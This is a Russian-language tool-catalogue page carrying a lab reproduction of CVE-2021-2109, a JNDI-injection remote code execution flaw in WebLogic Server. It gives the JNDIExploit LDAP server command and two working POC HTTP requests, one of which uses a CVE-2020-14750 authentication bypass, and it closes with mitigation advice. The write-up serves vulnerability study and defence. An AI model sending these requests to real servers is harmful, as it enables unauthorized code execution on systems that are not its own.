Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-2109 — Пошаговое воспроизведение и анализ CVE-2021-2109, уязвимости удаленного выполнения кода в Weblogic Server через JNDI-инъекцию, с POC и рекомендациями по смягчению. | Kitploit
Инструменты/GitHubGitHub/rabbitsafe/cve-2021-2109
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubrabbitsafe/cve-2021-2109

CVE-2021-2109

Пошаговое воспроизведение и анализ CVE-2021-2109, уязвимости удаленного выполнения кода в Weblogic Server через JNDI-инъекцию, с POC и рекомендациями по смягчению.

Репозиторий
9555 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-2109 Weblogic Server: воспроизведение и анализ уязвимости удалённого выполнения кода

В январе 2021 года Oracle выпустила обновление безопасности, включающее 329 новых патчей безопасности для продуктов Oracle. В этом уведомлении особо упоминалось уведомление о безопасности Oracle WebLogic Server от 1 ноября 2020 года, касающееся уязвимости CVE-2020-14750. Клиентам настоятельно рекомендуется применить этот патч, а также другие патчи из этого уведомления. CVE-2021-2109 — это уязвимость удалённого выполнения кода в Weblogic. Уязвимость в основном обусловлена JNDI-инъекцией, что позволяет злоумышленнику удалённо выполнять код.

Затронуты следующие версии: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0

  1. Воспроизведение уязвимости удалённого выполнения кода CVE-2021-2109 Weblogic Server

Тестовая среда Weblogic Server разворачивается с помощью DOCKER; Weblogic Server доступен. image

  1. JNDI-инъекция при штатном входе в консоль управления В первом случае необходимо войти в консоль управления Weblogic Server с учётной записью администратора, перехватить пакет данных входа с помощью BurpSuite и получить данные Cookie для входа.

image

Запустите LDAP на локальной машине; его можно загрузить по адресу https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. Команда: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

image

Отправьте POC-пакет JNDI-инъекции для уязвимости удалённого выполнения кода CVE-2021-2109 Weblogic Server: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Выполните системную команду ipconfig через переменную cmd

image

  1. JNDI-инъекция в сочетании с неавторизованным доступом к консоли Weblogic Server Во втором случае вход в консоль Weblogic Server не требуется. Необходимо использовать уязвимость неавторизованного доступа CVE-2020-14750 Weblogic Server и отправить POC-пакет JNDI-инъекции для уязвимости удалённого выполнения кода CVE-2021-2109 Weblogic Server: POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Выполните calc.exe через переменную cmd, чтобы открыть системный калькулятор

image

image

Системный калькулятор открыт

image

  1. Рекомендации по безопасности для уязвимости удалённого выполнения кода CVE-2021-2109 Weblogic Server

  2. Отключите протокол T3 Если вы не полагаетесь на протокол T3 для связи JVM, можно снизить влияние этой уязвимости, временно заблокировав протокол T3. 1). Войдите в консоль WebLogic, на странице конфигурации base_domain перейдите на вкладку «Безопасность», нажмите «Фильтр» и настройте фильтр. 2). В поле «Фильтр подключения» введите: weblogic.security.net.ConnectionFilterImpl, а в поле правил фильтра подключения введите: * * 7001 deny t3 t3s.

  3. Отключите IIOP Войдите в консоль WebLogic, найдите опцию включения IIOP, снимите флажок и перезапустите сервер, чтобы изменения вступили в силу.

  4. Временно закройте внешний доступ к /console/console.portal

  5. Установите официальный патч безопасности

Скачать инструмент